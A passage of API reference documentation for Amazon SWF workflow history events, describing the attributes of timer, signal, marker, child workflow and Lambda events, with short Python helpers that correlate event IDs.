If the event is of type ``WorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **signalName** *(string) --*
The name of the signal received. The decider can use the signal name and inputs to determine how to process the signal.
- **input** *(string) --*
The inputs provided with the signal. The decider can use the signal name and inputs to determine how to process the signal.
- **externalWorkflowExecution** *(dict) --*
The workflow execution that sent the signal. This is set only if the signal was sent by another workflow execution.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflow`` decision to signal this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event. This field is set only if the signal was initiated by another workflow execution.
- **markerRecordedEventAttributes** *(dict) --*
If the event is of type ``MarkerRecorded`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The name of the marker.
- **details** *(string) --*
The details of the marker.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarker`` decision that requested this marker. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **recordMarkerFailedEventAttributes** *(dict) --*
If the event is of type ``RecordMarkerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The marker's name.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarker`` decision that failed. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerStartedEventAttributes** *(dict) --*
If the event is of type ``TimerStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was started.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **startToFireTimeout** *(string) --*
The duration of time after which the timer fires.
The duration is specified in seconds, an integer greater than or equal to ``0`` .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision to start this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerFiredEventAttributes** *(dict) --*
If the event is of type ``TimerFired`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that fired.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerCanceledEventAttributes** *(dict) --*
If the event is of type ``TimerCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was canceled.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
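The ``startedEventId`` back-references above let a decider join a timer's terminal event to the ``TimerStarted`` event that created it. A minimal sketch (the helper name and sample event shapes are illustrative, not part of the API), assuming ``events`` is the ``events`` list from the response:

```python
def correlate_timer_events(events):
    """Pair each TimerFired/TimerCanceled event with the TimerStarted
    event it references through startedEventId (hypothetical helper)."""
    started = {
        e["eventId"]: e["timerStartedEventAttributes"]
        for e in events
        if e["eventType"] == "TimerStarted"
    }
    outcomes = {}
    for e in events:
        if e["eventType"] == "TimerFired":
            attrs = e["timerFiredEventAttributes"]
        elif e["eventType"] == "TimerCanceled":
            attrs = e["timerCanceledEventAttributes"]
        else:
            continue
        # startedEventId links back to the TimerStarted event for this timer
        outcomes[attrs["timerId"]] = {
            "outcome": e["eventType"],
            "startToFireTimeout": started[attrs["startedEventId"]]["startToFireTimeout"],
        }
    return outcomes
```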
- **startChildWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks. This data isn't sent to the activity.
- **input** *(string) --*
The inputs provided to the child workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for the child workflow execution. If the workflow execution isn't closed within this duration, it is timed out and force-terminated.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The name of the task list used for the decision tasks of the child workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority assigned for the decision tasks for this workflow execution. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` Decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this execution gets terminated by explicitly calling the TerminateWorkflowExecution action or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration allowed for the decision tasks for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **tagList** *(list) --*
The list of tags to associate with the child workflow execution.
- *(string) --*
- **lambdaRole** *(string) --*
The IAM role to attach to the child workflow execution.
- **childWorkflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was started.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was completed.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **result** *(string) --*
The result of the child workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that failed.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **reason** *(string) --*
The reason for the failure (if provided).
- **details** *(string) --*
The details of the failure (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that timed out.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **timeoutType** *(string) --*
The type of the timeout that caused the child workflow execution to time out.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was canceled.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **details** *(string) --*
Details of the cancellation (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was terminated.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
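Each child workflow terminal event (``Completed``, ``Failed``, ``TimedOut``, ``Canceled``, ``Terminated``) carries an ``initiatedEventId`` that points back at the ``StartChildWorkflowExecutionInitiated`` event, which in turn records the child's ``workflowId``. A sketch of joining the two (the helper and sample data are illustrative, not part of the API):

```python
# Map each child workflow terminal event type to its attributes key.
_TERMINAL_ATTR_KEYS = {
    "ChildWorkflowExecutionCompleted": "childWorkflowExecutionCompletedEventAttributes",
    "ChildWorkflowExecutionFailed": "childWorkflowExecutionFailedEventAttributes",
    "ChildWorkflowExecutionTimedOut": "childWorkflowExecutionTimedOutEventAttributes",
    "ChildWorkflowExecutionCanceled": "childWorkflowExecutionCanceledEventAttributes",
    "ChildWorkflowExecutionTerminated": "childWorkflowExecutionTerminatedEventAttributes",
}

def child_workflow_outcomes(events):
    """Summarize child workflow outcomes keyed by the workflowId recorded
    in the StartChildWorkflowExecutionInitiated event (hypothetical helper)."""
    initiated = {
        e["eventId"]: e["startChildWorkflowExecutionInitiatedEventAttributes"]["workflowId"]
        for e in events
        if e["eventType"] == "StartChildWorkflowExecutionInitiated"
    }
    outcomes = {}
    for e in events:
        attr_key = _TERMINAL_ATTR_KEYS.get(e["eventType"])
        if attr_key:
            # initiatedEventId joins the terminal event to its Initiated event
            outcomes[initiated[e[attr_key]["initiatedEventId"]]] = e["eventType"]
    return outcomes
```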
- **signalExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to send the signal to.
- **signalName** *(string) --*
The name of the signal.
- **input** *(string) --*
The input provided to the signal.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks.
- **externalWorkflowExecutionSignaledEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution that the signal was delivered to.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **signalExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution that the signal was being delivered to.
- **runId** *(string) --*
The ``runId`` of the external workflow execution that the signal was being delivered to.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
- **externalWorkflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution to which the cancellation request was delivered.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution to be canceled.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to be canceled.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **requestCancelExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow to which the cancel request was to be delivered.
- **runId** *(string) --*
The ``runId`` of the external workflow execution.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
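Both failure events above surface a ``cause`` that is ``OPERATION_NOT_PERMITTED`` when the decision lacked IAM permissions, so a decider can scan the history for permissions problems in one pass. A minimal sketch (helper name and sample data are illustrative, not part of the API):

```python
# Map each failure event type to its attributes key in the HistoryEvent dict.
_FAILED_ATTR_KEYS = {
    "SignalExternalWorkflowExecutionFailed":
        "signalExternalWorkflowExecutionFailedEventAttributes",
    "RequestCancelExternalWorkflowExecutionFailed":
        "requestCancelExternalWorkflowExecutionFailedEventAttributes",
}

def permission_failures(events):
    """Return the failure events whose cause indicates missing IAM
    permissions (hypothetical helper)."""
    return [
        e for e in events
        if e["eventType"] in _FAILED_ATTR_KEYS
        and e[_FAILED_ATTR_KEYS[e["eventType"]]]["cause"] == "OPERATION_NOT_PERMITTED"
    ]
```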
- **scheduleActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ScheduleActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The activity type provided in the ``ScheduleActivityTask`` decision that failed.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **activityId** *(string) --*
The activityId provided in the ``ScheduleActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityId** *(string) --*
The activityId provided in the ``RequestCancelActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startTimerFailedEventAttributes** *(dict) --*
If the event is of type ``StartTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``StartTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision for this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelTimerFailedEventAttributes** *(dict) --*
If the event is of type ``CancelTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``CancelTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startChildWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowType** *(dict) --*
The workflow type provided in the ``StartChildWorkflowExecution`` Decision that failed.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
When ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision fails because it lacks sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **initiatedEventId** *(integer) --*
When the ``cause`` is ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is the ID of the ``StartChildWorkflowExecutionInitiated`` event that corresponds to the ``StartChildWorkflowExecution`` Decision to start the workflow execution. You can use this information to diagnose problems by tracing back the chain of events leading up to this event.
When the ``cause`` isn't ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is set to ``0`` because the ``StartChildWorkflowExecutionInitiated`` event doesn't exist.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` Decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the child workflow execution.
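The ``initiatedEventId`` convention described above (a real event ID only when ``cause`` is ``WORKFLOW_ALREADY_RUNNING``, otherwise ``0``) can be made explicit in a small formatter. A sketch (the helper is hypothetical, not part of the API):

```python
def describe_start_child_failure(event):
    """Render a StartChildWorkflowExecutionFailed event as a short
    diagnostic string (hypothetical helper)."""
    attrs = event["startChildWorkflowExecutionFailedEventAttributes"]
    if attrs["cause"] == "WORKFLOW_ALREADY_RUNNING":
        # Only in this case does a StartChildWorkflowExecutionInitiated
        # event exist, so initiatedEventId points at it.
        return (f"child {attrs['workflowId']} already running "
                f"(initiated event {attrs['initiatedEventId']})")
    # For any other cause the Initiated event was never recorded,
    # so initiatedEventId is 0 and carries no useful reference.
    return f"child {attrs['workflowId']} failed to start: {attrs['cause']}"
```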
- **lambdaFunctionScheduledEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionScheduled`` event. It isn't set for other event types.
- **id** *(string) --*
The unique ID of the Lambda task.
- **name** *(string) --*
The name of the Lambda function.
- **control** *(string) --*
Data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the Lambda task.
- **input** *(string) --*
The input provided to the Lambda task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker can take to process the Lambda task.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in scheduling this Lambda task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionStartedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionStarted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionCompletedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionCompleted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this Lambda task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **result** *(string) --*
The results of the Lambda task.
- **lambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this Lambda task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **lambdaFunctionTimedOutEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionTimedOut`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event that was recorded when this Lambda task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduleLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``ScheduleLambdaFunctionFailed`` event. It isn't set for other event types.
- **id** *(string) --*
The ID provided in the ``ScheduleLambdaFunction`` decision that failed.
- **name** *(string) --*
The name of the Lambda function.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in scheduling this Lambda task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``StartLambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
